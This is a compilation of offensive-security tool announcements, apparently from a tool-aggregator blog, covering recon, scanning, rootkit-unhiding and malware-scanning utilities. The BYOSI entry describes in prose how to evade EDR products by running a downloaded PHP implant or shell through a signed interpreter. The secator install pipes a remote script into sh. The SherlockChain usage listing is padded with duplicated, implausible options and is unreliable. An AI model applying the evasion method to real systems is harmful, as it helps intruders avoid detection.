Secator - The Pentester's Swiss Knife

By: Zion3R


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • Scales from simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

| Name | Description | Category |
|------|-------------|----------|
| httpx | Fast HTTP prober. | http |
| cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
| gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
| gospider | Fast web spider written in Go. | http/crawler |
| katana | Next-generation crawling and spidering framework. | http/crawler |
| dirsearch | Web path discovery. | http/fuzzer |
| feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
| ffuf | Fast web fuzzer written in Go. | http/fuzzer |
| h8mail | Email OSINT and breach hunting tool. | osint |
| dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
| dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
| subfinder | Fast subdomain finder. | recon/dns |
| fping | Find alive hosts on local networks. | recon/ip |
| mapcidr | Expand CIDR ranges into IPs. | recon/ip |
| naabu | Fast port discovery tool. | recon/port |
| maigret | Hunt for user accounts across many websites. | recon/user |
| gf | A wrapper around grep to avoid typing common patterns. | tagger |
| grype | A vulnerability scanner for container images and filesystems. | vuln/code |
| dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
| msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
| wpscan | WordPress security scanner. | vuln/multi |
| nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
| nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
| searchsploit | Exploit searcher. | exploit/search |

Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criteria before doing so. If it doesn't, but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and --net=host is recommended to grant full access to the host network. You can alias this command to make it easier to run:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator as if it were installed on bare metal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install the languages those tools are written in, if they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available versions for each tool before you run secator, or you might run into parsing / formatting issues.

Installing addons

secator is installed with a minimal set of dependencies.

There are several addons available for secator:

worker: Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
secator install addons worker
google: Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb: Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis: Add support for Redis backend (Celery).
secator install addons redis
dev: Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace: Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build: Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves

Checking installation health

To figure out which languages or tools are installed on your system (along with their versions):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a URL crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

and more... To list all the tasks / workflows / scans that you can use:

secator x --help
secator w --help
secator s --help

Learn more

To go deeper with secator, check out:

  • Our complete documentation

  • Our getting started tutorial video

  • Our Medium post

  • Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



Imperius - Make A Linux Kernel Rootkit Visible Again

By: Zion3R


A tool to make an LKM rootkit visible again.

This tool is part of research on LKM rootkits that will be published.


It works by obtaining the memory address of a rootkit's "show_module" function, for example, and using that address to call it, adding the rootkit back to lsmod and making it possible to remove it.

We can obtain the function address very simply on recent kernels using /sys/kernel/tracing/available_filter_functions_addrs; however, this file is only available from kernel 6.5 onwards.
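For example, assuming a rootkit whose visibility-restoring function is named "show_module" (a hypothetical symbol name), its address could be looked up like this:

# Sketch: look up the hidden module's helper in the kernel's traceable-symbol list (kernel >= 6.5)
sudo grep show_module /sys/kernel/tracing/available_filter_functions_addrs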

An alternative is to scan the kernel memory for the function, and then add the module back to lsmod so it can be removed.

So, in summary, this LKM abuses the fact that LKM rootkits ship a function to make themselves visible again.

Note: there is another trick for removing/defusing an LKM rootkit, but it will be covered in the upcoming research.



BYOSI - Evade EDRs The Simple Way, By Not Touching Any Of The APIs They Hook

By: Zion3R


Evade EDRs the simple way, by not touching any of the APIs they hook.

Theory

I've noticed that most EDRs fail to scan scripting files, treating them merely as text files. While this might be unfortunate for them, it's an opportunity for us to profit.

Flashy methods like residing in memory or thread injection are heavily monitored. Without a binary signed by a valid Certificate Authority, execution is nearly impossible.

Enter BYOSI (Bring Your Own Scripting Interpreter). Every scripting interpreter is signed by its creator, with each certificate being valid. Testing in a live environment revealed surprising results: a highly signatured PHP script from this repository not only ran on systems monitored by CrowdStrike and Trellix but also established an external connection without triggering any EDR detections. EDRs typically overlook script files, focusing instead on binaries for implant delivery. They're configured to detect high entropy or suspicious sections in binaries, not simple scripts.

This attack method capitalizes on that oversight for significant profit. The PowerShell script's steps mirror what a developer might do when first entering an environment. Remarkably, just four lines of PowerShell code completely evade EDR detection, with Defender/AMSI also blind to it. Adding to the effectiveness, GitHub serves as a trusted deployer.


What this script does

The PowerShell script achieves EDR/AV evasion through four simple steps (technically 3):

1. It fetches the PHP archive for Windows and extracts it into a new directory named 'php' within 'C:\Temp'.
2. The script then proceeds to acquire the implant PHP script or shell, saving it in the same 'C:\Temp\php' directory.
3. Following this, it executes the implant or shell, utilizing the whitelisted PHP binary (which exempts the binary from most restrictions that would otherwise prevent it from running in the first place).

With these actions completed, congratulations: you now have an active shell on a CrowdStrike-monitored system. What's particularly amusing is that, if my memory serves me correctly, SentinelOne is unable to scan PHP file types. So, feel free to let your imagination run wild.

Disclaimer.

I am in no way responsible for the misuse of this. This issue is a major blind spot in EDR protection; I am only bringing it to everyone's attention.

Thanks Section

A big thanks to @im4x5yn74x for affectionately giving it the name BYOSI, and for helping with the test environment that brought this attack method to life.

Edit

It appears as though MS Defender is now flagging the PHP script as malicious, but it still fully allows the PowerShell script to execute. So, modify the PHP script.

Edit

Hello SentinelOne :) you might want to make sure that you are making links, not embeds.



Ashok - An OSINT Recon Tool, A.K.A. Swiss Army Knife

By: Zion3R


Reconnaissance is the first phase of penetration testing, meaning gathering information before any real attacks are planned. Ashok is an incredibly fast recon tool for penetration testers, specially designed for the reconnaissance phase. And in Ashok-v1.1 you can find the advanced Google dorker and Wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip install -r requirements.txt

How to use Ashok?

A detailed usage guide is available in the Usage section of the Wiki.

An index of the main options is given below:

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits



    X-Recon - A Utility For Detecting Webpage Inputs And Conducting XSS Scans

    By: Zion3R

    A utility for identifying web page inputs and conducting XSS scanning.


    Features:

    • Subdomain Discovery: Retrieves relevant subdomains for the target website and consolidates them into a whitelist. These subdomains can be utilized during the scraping process.

    • Site-wide Link Discovery: Collects all links throughout the website based on the provided whitelist and the specified max_depth.

    • Form and Input Extraction: Identifies all forms and inputs found within the extracted links, generating a JSON output. This JSON output serves as a foundation for leveraging the XSS scanning capability of the tool.

    • XSS Scanning: Once the start recon option returns a custom JSON containing the extracted entries, the X-Recon tool can initiate the XSS vulnerability testing process and furnish you with the desired results!



    Note:

    The scanning functionality is currently not supported on SPA (Single Page Application) web applications; we have only tested it on websites developed with PHP, yielding remarkable results. SPA support is planned for a future release.




    Note:

    This tool maintains an up-to-date list of file extensions that it skips during the exploration process. The default list includes common file types such as images, stylesheets, and scripts (".css", ".js", ".mp4", ".zip", ".png", ".svg", ".jpeg", ".webp", ".jpg", ".gif"). You can customize this list to better suit your needs by editing the setting.json file.

    Installation

    $ git clone https://github.com/joshkar/X-Recon
    $ cd X-Recon
    $ python3 -m pip install -r requirements.txt
    $ python3 xr.py

    Target For Test:

    You can use this address in the Get URL section

      http://testphp.vulnweb.com


    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses.

    The --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    1. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.
    2. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    3. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    4. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    5. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    6. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
    [--filter-check-upgradeable] [--filter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
    [--report-severity REPORT_SEVERITY] [--report-impact REPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
    [--report-all-options] [--report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
    [--ai-models-config-version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.

    AI-Powered Detectors

    | Num | Detector | What it Detects | Impact | Confidence |
    |---|---|---|---|---|
    | 1 | ai-anomaly-detection | Detect anomalous code patterns using advanced AI models | High | High |
    | 2 | ai-vulnerability-prediction | Predict potential vulnerabilities using machine learning | High | High |
    | 3 | ai-code-optimization | Suggest code optimizations based on AI-driven analysis | Medium | High |
    | 4 | ai-contract-complexity | Assess contract complexity and maintainability using AI | Medium | High |
    | 5 | ai-gas-optimization | Identify gas-optimizing opportunities with AI | Medium | Medium |
    Detectors

    | Num | Detector | What it Detects | Impact | Confidence |
    |---|---|---|---|---|
    | 1 | abiencoderv2-array | Storage abiencoderv2 array | High | High |
    | 2 | arbitrary-send-erc20 | transferFrom uses arbitrary from | High | High |
    | 3 | array-by-reference | Modifying storage array by value | High | High |
    | 4 | encode-packed-collision | ABI encodePacked Collision | High | High |
    | 5 | incorrect-shift | The order of parameters in a shift instruction is incorrect. | High | High |
    | 6 | multiple-constructors | Multiple constructor schemes | High | High |
    | 7 | name-reused | Contract's name reused | High | High |
    | 8 | protected-vars | Detected unprotected variables | High | High |
    | 9 | public-mappings-nested | Public mappings with nested variables | High | High |
    | 10 | rtlo | Right-To-Left-Override control character is used | High | High |
    | 11 | shadowing-state | State variables shadowing | High | High |
    | 12 | suicidal | Functions allowing anyone to destruct the contract | High | High |
    | 13 | uninitialized-state | Uninitialized state variables | High | High |
    | 14 | uninitialized-storage | Uninitialized storage variables | High | High |
    | 15 | unprotected-upgrade | Unprotected upgradeable contract | High | High |
    | 16 | codex | Use Codex to find vulnerabilities. | High | Low |
    | 17 | arbitrary-send-erc20-permit | transferFrom uses arbitrary from with permit | High | Medium |
    | 18 | arbitrary-send-eth | Functions that send Ether to arbitrary destinations | High | Medium |
    | 19 | controlled-array-length | Tainted array length assignment | High | Medium |
    | 20 | controlled-delegatecall | Controlled delegatecall destination | High | Medium |
    | 21 | delegatecall-loop | Payable functions using delegatecall inside a loop | High | Medium |
    | 22 | incorrect-exp | Incorrect exponentiation | High | Medium |
    | 23 | incorrect-return | If a return is incorrectly used in assembly mode. | High | Medium |
    | 24 | msg-value-loop | msg.value inside a loop | High | Medium |
    | 25 | reentrancy-eth | Reentrancy vulnerabilities (theft of ethers) | High | Medium |
    | 26 | return-leave | If a return is used instead of a leave. | High | Medium |
    | 27 | storage-array | Signed storage integer array compiler bug | High | Medium |
    | 28 | unchecked-transfer | Unchecked tokens transfer | High | Medium |
    | 29 | weak-prng | Weak PRNG | High | Medium |
    | 30 | domain-separator-collision | Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() | Medium | High |
    | 31 | enum-conversion | Detect dangerous enum conversion | Medium | High |
    | 32 | erc20-interface | Incorrect ERC20 interfaces | Medium | High |
    | 33 | erc721-interface | Incorrect ERC721 interfaces | Medium | High |
    | 34 | incorrect-equality | Dangerous strict equalities | Medium | High |
    | 35 | locked-ether | Contracts that lock ether | Medium | High |
    | 36 | mapping-deletion | Deletion on mapping containing a structure | Medium | High |
    | 37 | shadowing-abstract | State variables shadowing from abstract contracts | Medium | High |
    | 38 | tautological-compare | Comparing a variable to itself always returns true or false, depending on comparison | Medium | High |
    | 39 | tautology | Tautology or contradiction | Medium | High |
    | 40 | write-after-write | Unused write | Medium | High |
    | 41 | boolean-cst | Misuse of Boolean constant | Medium | Medium |
    | 42 | constant-function-asm | Constant functions using assembly code | Medium | Medium |
    | 43 | constant-function-state | Constant functions changing the state | Medium | Medium |
    | 44 | divide-before-multiply | Imprecise arithmetic operations order | Medium | Medium |
    | 45 | out-of-order-retryable | Out-of-order retryable transactions | Medium | Medium |
    | 46 | reentrancy-no-eth | Reentrancy vulnerabilities (no theft of ethers) | Medium | Medium |
    | 47 | reused-constructor | Reused base constructor | Medium | Medium |
    | 48 | tx-origin | Dangerous usage of tx.origin | Medium | Medium |
    | 49 | unchecked-lowlevel | Unchecked low-level calls | Medium | Medium |
    | 50 | unchecked-send | Unchecked send | Medium | Medium |
    | 51 | uninitialized-local | Uninitialized local variables | Medium | Medium |
    | 52 | unused-return | Unused return values | Medium | Medium |
    | 53 | incorrect-modifier | Modifiers that can return the default value | Low | High |
    | 54 | shadowing-builtin | Built-in symbol shadowing | Low | High |
    | 55 | shadowing-local | Local variables shadowing | Low | High |
    | 56 | uninitialized-fptr-cst | Uninitialized function pointer calls in constructors | Low | High |
    | 57 | variable-scope | Local variables used prior their declaration | Low | High |
    | 58 | void-cst | Constructor called not implemented | Low | High |
    | 59 | calls-loop | Multiple calls in a loop | Low | Medium |
    | 60 | events-access | Missing Events Access Control | Low | Medium |
    | 61 | events-maths | Missing Events Arithmetic | Low | Medium |
    | 62 | incorrect-unary | Dangerous unary expressions | Low | Medium |
    | 63 | missing-zero-check | Missing Zero Address Validation | Low | Medium |
    | 64 | reentrancy-benign | Benign reentrancy vulnerabilities | Low | Medium |
    | 65 | reentrancy-events | Reentrancy vulnerabilities leading to out-of-order Events | Low | Medium |
    | 66 | return-bomb | A low level callee may consume all callers gas unexpectedly. | Low | Medium |
    | 67 | timestamp | Dangerous usage of block.timestamp | Low | Medium |
    | 68 | assembly | Assembly usage | Informational | High |
    | 69 | assert-state-change | Assert state change | Informational | High |
    | 70 | boolean-equal | Comparison to boolean constant | Informational | High |
    | 71 | cyclomatic-complexity | Detects functions with high (> 11) cyclomatic complexity | Informational | High |
    | 72 | deprecated-standards | Deprecated Solidity Standards | Informational | High |
    | 73 | erc20-indexed | Un-indexed ERC20 event parameters | Informational | High |
    | 74 | function-init-state | Function initializing state variables | Informational | High |
    | 75 | incorrect-using-for | Detects using-for statement usage when no function from a given library matches a given type | Informational | High |
    | 76 | low-level-calls | Low level calls | Informational | High |
    | 77 | missing-inheritance | Missing inheritance | Informational | High |
    | 78 | naming-convention | Conformity to Solidity naming conventions | Informational | High |
    | 79 | pragma | If different pragma directives are used | Informational | High |
    | 80 | redundant-statements | Redundant statements | Informational | High |
    | 81 | solc-version | Incorrect Solidity version | Informational | High |
    | 82 | unimplemented-functions | Unimplemented functions | Informational | High |
    | 83 | unused-import | Detects unused imports | Informational | High |
    | 84 | unused-state | Unused state variables | Informational | High |
    | 85 | costly-loop | Costly operations in a loop | Informational | Medium |
    | 86 | dead-code | Functions that are not used | Informational | Medium |
    | 87 | reentrancy-unlimited-gas | Reentrancy vulnerabilities through send and transfer | Informational | Medium |
    | 88 | similar-names | Variable names are too similar | Informational | Medium |
    | 89 | too-many-digits | Conformance to numeric notation best practices | Informational | Medium |
    | 90 | cache-array-length | Detects for loops that use length member of some storage array in their loop condition and don't modify it. | Optimization | High |
    | 91 | constable-states | State variables that could be declared constant | Optimization | High |
    | 92 | external-function | Public function that could be declared external | Optimization | High |
    | 93 | immutable-states | State variables that could be declared immutable | Optimization | High |
    | 94 | var-read-using-this | Contract reads its own variable using this | Optimization | High |


    Drs-Malware-Scan - Perform File-Based Malware Scan On Your On-Prem Servers With AWS

    By: Zion3R


    Perform malware scan analysis of on-prem servers using AWS services

    Challenges with on-premises malware detection

    It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient as modern malware uses various obfuscation techniques. Server admins may lack visibility into security events across all servers historically. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to setup and maintain additional security tools for advanced threat detection. The rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.

    Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.


    How to use AWS services to address these challenges

    The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.

    This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.

    • AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.

    • Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.

    • AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.

    Architecture

    Solution description

    The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and that Amazon GuardDuty & AWS Security Hub are enabled. The CDK stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.

    1. AWS DRS is replicating source servers from the on-premises environment to AWS (or from any cloud provider for that matter). For further details about setting up AWS DRS please follow the Quick Start Guide.
    2. Amazon GuardDuty is already enabled.
    3. AWS Security Hub is already enabled.
    4. The Malware Scan solution is triggered by a Schedule Rule in Amazon EventBridge (with prefix DrsMalwareScanStack-ScheduleScanRule). You can adjust the scan frequency as needed (e.g. once a day, once a week, etc.).
    5. The Schedule Rule in Amazon EventBridge triggers the Submit Orders lambda function (with prefix DrsMalwareScanStack-SubmitOrders) which gathers the source servers to scan from the Source Servers DynamoDB table.
    6. Orders are placed on the SQS FIFO queue named Scan Orders (with prefix DrsMalwareScanStack-ScanOrdersfifo). The queue is used to serialize scan requests mapped to the same DRS instance, preventing a race condition.
    7. The Process Order lambda picks a malware scan order from the queue and enriches it, preparing the upcoming malware scan operation. For instance, it inserts the id of the replicating DRS instance associated with the DRS source server provided in the order. The output of Process Order is a set of malware scan commands containing all the necessary information to invoke the GuardDuty malware scan.
    8. Malware scan operations are tracked using the DRSVolumeAnnotationsDDBTable at the volume-level, providing reporting capabilities.
    9. Malware scan commands are inserted in the Scan Commands SQS FIFO queue (with prefix DrsMalwareScanStack-ScanCommandsfifo) to increase resiliency.
    10. The Process Commands function submits queued scan commands at a maximum rate of 1 command per second to avoid API throttling. It triggers the on-demand malware scan function provided by Amazon GuardDuty.
    11. The execution of the on-demand Amazon GuardDuty Malware job can be monitored from the Amazon GuardDuty service.
    12. The outcome of the malware scan job is routed to Amazon CloudWatch Logs.
    13. The Subscription Filter lambda function receives the outcome of the scan and tracks the result using DynamoDB (step #14).
    14. The DRS Instance Annotations DynamoDB Table tracks the status of the malware scan job at the instance level.
    15. The CDK stack named ScanReportStack deploys the Scan Report lambda function (with prefix ScanReportStack-ScanReport) to populate the Amazon S3 bucket with prefix scanreportstack-scanreportbucket.
    16. AWS Security Hub aggregates and correlates findings from Amazon GuardDuty.
    17. The Security Hub finding event is caught by an EventBridge Rule (with prefix DrsMalwareScanStack-SecurityHubAnnotationsRule).
    18. The Security Hub Annotations lambda function (with prefix DrsMalwareScanStack-SecurityHubAnnotation) generates additional Notes (Annotations) to the Finding with contextualized information about the source server being affected. This additional information can be seen in the Notes section within the Security Hub Finding.
    19. The follow-up activities will depend on the incident response process being adopted. For example based on the date of the infection, AWS DRS can be used to perform a point in time recovery using a snapshot previous to the date of the malware infection.
